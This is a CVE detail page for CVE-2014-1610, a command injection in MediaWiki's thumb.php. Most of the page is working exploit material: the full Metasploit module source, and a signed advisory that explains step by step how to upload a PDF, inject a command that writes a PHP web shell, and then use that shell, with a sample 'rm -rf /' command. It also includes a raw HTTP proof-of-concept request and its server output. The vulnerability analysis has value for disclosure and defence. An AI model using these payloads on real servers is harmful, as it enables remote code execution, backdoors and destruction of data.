CVE-2014-1610 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'MediaWiki Thumb.php Remote Command Execution', 'Description' => %q{ MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote unauthenticated users to execute arbitrary commands via shell metacharacters. If no target file is specified this module will attempt to log in with the provided credentials to upload a file (.DjVu) to use for exploitation. }, 'Author' => [ 'Netanel Rubin', # from Check Point - Discovery 'Brandon Perry', # Metasploit Module 'Ben Harris', # Metasploit Module 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-1610' ], [ 'OSVDB', '102630'], [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ], [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ] ], 'Privileged' => false, 'Targets' => [ [ 'Automatic PHP-CLI', { 'Payload' => { 'BadChars' => "\r\n", 'PrependEncoder' => "php -r \"", 'AppendEncoder' => "\"" }, 'Platform' => ['php'], 'Arch' => ARCH_PHP } ], [ 'Linux CMD', { 'Payload' => { 'BadChars' => "", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python php', } }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD } ], [ 'Windows CMD', { 'Payload' => { 'BadChars' => "", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl', } }, 'Platform' => ['win'], 'Arch' => ARCH_CMD } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 28 2014')) register_options( [ OptString.new('TARGETURI', [ true, "Base MediaWiki path", '/mediawiki' ]), OptString.new('FILENAME', [ false, "Target DjVu/PDF file (e.g target.djvu target.pdf)", nil ]), OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]), OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ]) ], self.class) end def get_version(body) meta_generator = get_html_value(body, 'meta', 'generator', 'content') unless meta_generator vprint_status("No META Generator tag on #{full_uri}.") return nil, nil, nil end if meta_generator && meta_generator =~ /mediawiki/i vprint_status("#{meta_generator} detected.") meta_generator =~ /(\d)\.(\d+)[\.A-z]+(\d+)/ major = $1.to_i minor = $2.to_i patch = $3.to_i vprint_status("Major:#{major} Minor:#{minor} Patch:#{patch}") return major, minor, patch end return nil, nil, nil end def check uri = target_uri.path opts = { 'uri' => normalize_uri(uri, 'index.php') } response = send_request_cgi!(opts) if opts['redirect_uri'] vprint_status("Redirected to #{opts['redirect_uri']}.") end unless response vprint_status("No response from #{full_uri}.") return CheckCode::Unknown end # Mediawiki will give a 404 for unknown pages but still have a body if response.code == 200 || response.code == 404 vprint_status("#{response.code} response received...") major, minor, patch = get_version(response.body) unless major return CheckCode::Unknown end if major == 1 && (minor < 8 || minor > 22) return CheckCode::Safe elsif major == 1 && (minor == 22 && patch > 1) return CheckCode::Safe elsif major == 1 && (minor == 21 && patch > 4) return CheckCode::Safe elsif major == 1 && (minor == 19 && patch > 10) return CheckCode::Safe elsif major == 1 return CheckCode::Appears else return CheckCode::Safe end end vprint_status("Received response code #{response.code} from #{full_uri}") CheckCode::Unknown end def exploit uri = target_uri.path print_status("Grabbing version and login CSRF token...") response = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php'), 'vars_get' => { 'title' => 'Special:UserLogin' } }) unless response fail_with(Failure::NotFound, "Failed to retrieve webpage.") end server = response['Server'] if server && target.name =~ /automatic/i && server =~ /win32/i vprint_status("Windows platform detected: #{server}.") my_platform = Msf::Module::Platform::Windows elsif server && target.name =~ /automatic/i vprint_status("Nix platform detected: #{server}.") my_platform = Msf::Module::Platform::Unix else my_platform = target.platform.platforms.first end # If we have already identified a DjVu/PDF file on the server trigger # the exploit unless datastore['FILENAME'].blank? payload_request(uri, datastore['FILENAME'], my_platform) return end username = datastore['USERNAME'] password = datastore['PASSWORD'] major, minor, patch = get_version(response.body) # Upload CSRF added in v1.18.2 # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1 if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1)) upload_csrf = false elsif ((major == 1) && (minor < 18)) upload_csrf = false else upload_csrf = true end session_cookie = response.get_cookies wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value') if wp_login_token.blank? fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?") else print_good("Retrieved login CSRF token.") end print_status("Attempting to login...") login = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php'), 'method' => 'POST', 'vars_get' => { 'title' => 'Special:UserLogin', 'action' => 'submitlogin', 'type' => 'login' }, 'cookie' => session_cookie, 'vars_post' => { 'wpName' => username, 'wpPassword' => password, 'wpLoginAttempt' => 'Log in', 'wpLoginToken' => wp_login_token } }) if login and login.code == 302 print_good("Log in successful.") else fail_with(Failure::NoAccess, "Failed to log in.") end auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','') # Testing v1.15.1 it looks like it has session fixation # vulnerability so we dont get a new session cookie after # authenticating. Therefore we need to include our old cookie. unless auth_cookie.include? 'session=' auth_cookie << session_cookie end print_status("Getting upload CSRF token...") if upload_csrf upload_file = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), 'cookie' => auth_cookie }) unless upload_file and upload_file.code == 200 fail_with(Failure::NotFound, "Failed to access file upload page.") end wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value') title = get_html_value(upload_file.body, 'input', 'title', 'value') if upload_csrf && wp_edit_token.blank? fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?") elsif upload_csrf print_good("Retrieved upload CSRF token.") end upload_mime = Rex::MIME::Message.new djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu")) file_name = "#{rand_text_alpha(4)}.djvu" upload_mime.add_part(djvu_file, "application/octet-stream", "binary", "form-data; name=\"wpUploadFile\"; filename=\"#{file_name}\"") upload_mime.add_part("#{file_name}", nil, nil, "form-data; name=\"wpDestFile\"") upload_mime.add_part("#{rand_text_alpha(4)}", nil, nil, "form-data; name=\"wpUploadDescription\"") upload_mime.add_part("", nil, nil, "form-data; name=\"wpLicense\"") upload_mime.add_part("1",nil,nil, "form-data; name=\"wpIgnoreWarning\"") upload_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\"wpEditToken\"") if upload_csrf upload_mime.add_part(title, nil, nil, "form-data; name=\"title\"") upload_mime.add_part("1", nil, nil, "form-data; name=\"wpDestFileWarningAck\"") upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\"wpUpload\"") post_data = upload_mime.to_s print_status("Uploading DjVu file #{file_name}...") upload = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), 'data' => post_data, 'ctype' => "multipart/form-data; boundary=#{upload_mime.bound}", 'cookie' => auth_cookie }) if upload and upload.code == 302 and upload.headers['Location'] location = upload.headers['Location'] print_good("File uploaded to #{location}") else if upload.body.include? 'not a permitted file type' fail_with(Failure::NotVulnerable, "Wiki is not configured for target files.") else fail_with(Failure::UnexpectedReply, "Failed to upload file.") end end payload_request(uri, file_name, my_platform) end def payload_request(uri, file_name, my_platform) if my_platform == Msf::Module::Platform::Windows trigger = "1)&(#{payload.encoded})&" else trigger = "1;#{payload.encoded};" end vars_get = { 'f' => file_name } if file_name.include? '.pdf' vars_get['width'] = trigger elsif file_name.include? '.djvu' vars_get['width'] = 1 vars_get['p'] = trigger else fail_with(Failure::BadConfig, "Unsupported file extension: #{file_name}") end print_status("Sending payload request...") r = send_request_cgi({ 'uri' => normalize_uri(uri, 'thumb.php'), 'vars_get' => vars_get }, 1) if r && r.code == 404 && r.body =~ /not exist/ print_error("File: #{file_name} does not exist.") elsif r print_error("Received response #{r.code}, exploit probably failed.") end end # The order of name, value keeps shifting so regex is painful. # Cant use nokogiri due to security issues # Cant use REXML directly as its not strict XHTML # So we do a filthy mixture of regex and REXML def get_html_value(html, type, name, value) return nil unless html return nil unless type return nil unless name return nil unless value found = nil html.each_line do |line| if line =~ /(<#{type}[^\/]*name="#{name}".*?\/>)/i found = $& break end end if found doc = REXML::Document.new found return doc.root.attributes[value] end '' end end

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 #################################################################### # # MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) # Reported by Netanel Rubin - Check Point’s Vulnerability Research Group (Jan 19, 2014) # Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) # Affected website : Wikipedia.org and more ! # # Exploit author : Xelenonz & @u0x (Pichaya Morimoto) # Release dates : Feb 1, 2014 # Special Thanks to 2600 Thailand ! # #################################################################### # Exploit: #################################################################### 1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) http://vulnerable-site/index.php/Special:Upload 2. inject os cmd to upload a php-backdoor http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 "<?php%20system(\\$_GET[1]);">images/xnz.php` 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! # Related files: #################################################################### thumb.php <-- extract all _GET array to params /extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width options /includes/media/ImageHandler.php /includes/GlobalFunctions.php /includes/filerepo/file/File.php # Vulnerability Analysis: #################################################################### 1. thumb.php This script used to resize images if it is configured to be done when the web browser requests the image <? ... 1.1 Called directly, use $_GET params wfThumbHandleRequest(); 1.2 Handle a thumbnail request via query parameters function wfThumbHandleRequest() { $params = get_magic_quotes_gpc() ? array_map( 'stripslashes', $_GET ) : $_GET; << WTF wfStreamThumb( $params ); // stream the thumbnail } 1.3 Stream a thumbnail specified by parameters function wfStreamThumb( array $params ) { ... $fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts uploaded.pdf file here ... // Backwards compatibility parameters if ( isset( $params['w'] ) ) { $params['width'] = $params['w']; // << Inject os cmd here! unset( $params['w'] ); } ... $img = wfLocalFile( $fileName ); ... // Thumbnail isn't already there, so create the new thumbnail... $thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image by width/height ... // Stream the file if there were no errors $thumb->streamFile( $headers ); ... ?> 2. /includes/filerepo/file/File.php <? ... function transform( $params, $flags = 0 ) { ... $handler = $this->getHandler(); // << PDF Handler ... $normalisedParams = $params; $handler->normaliseParams( $this, $normalisedParams ); ... $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params ); .. ?> 3. /extensions/PdfHandler/PdfHandler_body.php <? ... function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) { ... $width = $params['width']; ... $cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd & parameters $cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} -dLastPage={$page}"; $cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q ". wfEscapeShellArg( $srcPath ); $cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor ); $cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shell argument $cmd .= wfEscapeShellArg( $dstPath ) . ")"; $cmd .= " 2>&1"; ... $err = wfShellExec( $cmd, $retval ); ... ?> 4. /includes/GlobalFunctions.php Execute a shell command, with time and memory limits <? ... function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = array() ) { ... passthru( $cmd, $retval ); // << Execute here!! # Proof-Of-Concept #################################################################### GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C php%20system(\\$_GET[1]);%22%3Eimages/longcat.php` HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=op3h2huvddnmg7gji0pscfsg02 <html><head><title>Error generating thumbnail</title></head> <body> <h1>Error generating thumbnail</h1> <p> เกิดปัญหาไม่สามารถทำรูปย่อได้: /bin/bash: -: command not found<br /> convert: option requires an argument `-resize' @ error/convert.c/ConvertImageCommand/2380.<br /> GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br /> </p> </body> </html> GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1 uid=33(www-data) gid=33(www-data) groups=33(www-data) # Back-end $cmd #################################################################### GlobalFunctions.php : wfShellExec() cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | '/usr/bin/convert' -depth 8 -resize 10|`echo "<?php system(\\$_GET[1]);">images/longcat.php` - '/tmp/transform_0e377aad0e27-1.jpg') 2>&1 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.14 (GNU/Linux) iQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU BzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf ny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1 mijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2 uCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb GO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv n2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh FXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt vuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ M0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan kumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR 2LmeyQR2rzjBB7Sovvcn =ooEs -----END PGP SIGNATURE-----